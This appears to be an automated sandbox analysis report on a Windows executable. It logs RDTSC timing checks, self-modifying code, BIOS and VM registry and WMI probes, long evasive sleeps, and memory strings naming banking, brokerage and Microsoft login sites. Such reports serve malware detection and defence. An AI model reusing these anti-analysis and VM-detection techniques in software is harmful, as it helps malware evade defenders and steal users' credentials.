Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6ADDB second address: 5E6ADE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6ADE3 second address: 5E6ADEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F83ACE24F26h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6ADEF second address: 5E6ADF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6ADF3 second address: 5E6ADFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E207 second address: 5CED971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F83ACDAA9E6h 0x00000009 jnp 00007F83ACDAA9E6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 6712F9BAh 0x00000019 pushad 0x0000001a add ecx, 00B09A44h 0x00000020 jnp 00007F83ACDAA9E9h 0x00000026 popad 0x00000027 push dword ptr [ebp+122D0BB9h] 0x0000002d jmp 00007F83ACDAA9F3h 0x00000032 call dword ptr [ebp+122D20ECh] 0x00000038 pushad 0x00000039 mov dword ptr [ebp+122D20B8h], edx 0x0000003f xor eax, eax 0x00000041 jmp 00007F83ACDAA9EFh 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a jmp 00007F83ACDAA9F9h 0x0000004f mov dword ptr [ebp+122D3775h], eax 0x00000055 mov dword ptr [ebp+122D2130h], esi 0x0000005b mov dword ptr [ebp+122D20B8h], edi 0x00000061 mov esi, 0000003Ch 0x00000066 cld 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b xor dword ptr [ebp+122D20B8h], edi 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D20E2h], ebx 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d or dword ptr [ebp+122D2EF7h], ebx 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 mov dword ptr [ebp+122D20B8h], edx 0x0000008d push eax 0x0000008e pushad 0x0000008f pushad 0x00000090 jbe 00007F83ACDAA9E6h 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E416 second address: 5E6E41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E41F second address: 5E6E423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E423 second address: 5E6E4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7D2E72D0h 0x0000000e mov si, di 0x00000011 push 00000003h 0x00000013 pushad 0x00000014 jl 00007F83ACE24F29h 0x0000001a mov di, bx 0x0000001d movzx esi, cx 0x00000020 popad 0x00000021 mov cl, bl 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F83ACE24F28h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov cx, EAF0h 0x00000043 push 00000003h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007F83ACE24F28h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov esi, dword ptr [ebp+122D3699h] 0x00000065 push BB2F4A7Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E4A4 second address: 5E6E4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E4A8 second address: 5E6E4AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E4AC second address: 5E6E4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E4B2 second address: 5E6E4F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 04D0B584h 0x00000010 xor dword ptr [ebp+122D2F6Eh], esi 0x00000016 lea ebx, dword ptr [ebp+1245410Ah] 0x0000001c mov edi, dword ptr [ebp+122D37D5h] 0x00000022 mov ecx, dword ptr [ebp+122D36B1h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jl 00007F83ACE24F28h 0x00000031 push esi 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E542 second address: 5E6E5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F83ACDAA9ECh 0x0000000b jg 00007F83ACDAA9E6h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dword ptr [ebp+122D20BDh], ebx 0x0000001b push 00000000h 0x0000001d mov cl, 21h 0x0000001f call 00007F83ACDAA9E9h 0x00000024 jp 00007F83ACDAA9EEh 0x0000002a push eax 0x0000002b jmp 00007F83ACDAA9F4h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007F83ACDAA9F1h 0x00000039 mov eax, dword ptr [eax] 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E5A9 second address: 5E6E5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E5AD second address: 5E6E62D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F83ACDAA9ECh 0x0000000f jnp 00007F83ACDAA9E6h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jg 00007F83ACDAA9F6h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F83ACDAA9ECh 0x00000028 popad 0x00000029 pop eax 0x0000002a mov edi, dword ptr [ebp+122D3809h] 0x00000030 jmp 00007F83ACDAA9F4h 0x00000035 push 00000003h 0x00000037 mov si, BDE5h 0x0000003b push 00000000h 0x0000003d mov esi, dword ptr [ebp+122D3835h] 0x00000043 stc 0x00000044 push 00000003h 0x00000046 push edx 0x00000047 mov esi, dword ptr [ebp+122D36E5h] 0x0000004d pop ecx 0x0000004e call 00007F83ACDAA9E9h 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E62D second address: 5E6E631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E631 second address: 5E6E65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F83ACDAA9E8h 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F83ACDAA9EEh 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E65D second address: 5E6E663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E663 second address: 5E6E6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jns 00007F83ACDAA9F9h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F83ACDAA9EFh 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jnp 00007F83ACDAA9E6h 0x00000024 jmp 00007F83ACDAA9EEh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E6A0 second address: 5E6E6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E6E6A6 second address: 5E6E6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jnl 00007F83ACDAA9ECh 0x00000012 add edx, dword ptr [ebp+122D36BDh] 0x00000018 lea ebx, dword ptr [ebp+12454115h] 0x0000001e mov ecx, esi 0x00000020 xchg eax, ebx 0x00000021 js 00007F83ACDAAA04h 0x00000027 push eax 0x00000028 push edx 0x00000029 jng 00007F83ACDAA9E6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8E3C2 second address: 5E8E3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8E3C6 second address: 5E8E3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8E3D0 second address: 5E8E3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E566F7 second address: 5E56701 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83ACDAA9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8C1E9 second address: 5E8C1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8C1EF second address: 5E8C1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8C1F5 second address: 5E8C1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8C1FC second address: 5E8C201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8C35E second address: 5E8C362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8C615 second address: 5E8C61B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8C79A second address: 5E8C7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CC0B second address: 5E8CC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CC0F second address: 5E8CC2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F30h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jl 00007F83ACE24F26h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CC2F second address: 5E8CC62 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83ACDAA9EAh 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007F83ACDAA9ECh 0x00000015 js 00007F83ACDAA9E6h 0x0000001b jno 00007F83ACDAA9EEh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 jnc 00007F83ACDAA9E6h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CE02 second address: 5E8CE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CE06 second address: 5E8CE0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CE0B second address: 5E8CE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CE1A second address: 5E8CE20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CF55 second address: 5E8CF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8CF59 second address: 5E8CF63 instructions: 0x00000000 rdtsc 0x00000002 js 00007F83ACDAA9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8D0CA second address: 5E8D0CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8D0CE second address: 5E8D0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F83ACDAA9F7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8D0EB second address: 5E8D0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F83ACE24F2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8D4CA second address: 5E8D4EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F83ACDAA9FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8DD3A second address: 5E8DD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F34h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8DD53 second address: 5E8DD6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8DEF2 second address: 5E8DEF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8DEF6 second address: 5E8DEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8DEFC second address: 5E8DF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8DF02 second address: 5E8DF1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F83ACDAA9E6h 0x0000000b ja 00007F83ACDAA9E6h 0x00000011 jg 00007F83ACDAA9E6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8DF1E second address: 5E8DF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F83ACE24F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 5E8E1F1 second address: 5E8E1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Special instruction interceptor: First address: F58E76 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Special instruction interceptor: First address: 110069D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Special instruction interceptor: First address: 5CED92E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Special instruction interceptor: First address: 5CED9C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Special instruction interceptor: First address: 5E952FE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Special instruction interceptor: First address: 5E93D6B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Special instruction interceptor: First address: 5E93940 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Special instruction interceptor: First address: 5E9A503 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Code function: 0_2_05E85DAA rdtsc

0_2_05E85DAA

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Code function: 0_2_05E7FF3C sidt fword ptr [esp-02h]

0_2_05E7FF3C

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe TID: 1516	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe TID: 5232	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe TID: 1200	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe TID: 6192	Thread sleep time: -330000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe TID: 4440	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe TID: 3868	Thread sleep time: -34017s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: z3IxCpcpg4.exe, z3IxCpcpg4.exe, 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmp, z3IxCpcpg4.exe, 00000000.00000002.2571311166.0000000005E72000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: z3IxCpcpg4.exe, 00000000.00000003.2235275146.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: z3IxCpcpg4.exe, 00000000.00000002.2564809741.0000000000878000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2179020368.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000002.2564809741.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2397251222.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2478557246.00000000008C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: z3IxCpcpg4.exe, 00000000.00000002.2564809741.00000000008DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: z3IxCpcpg4.exe, 00000000.00000003.2235759140.00000000051B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
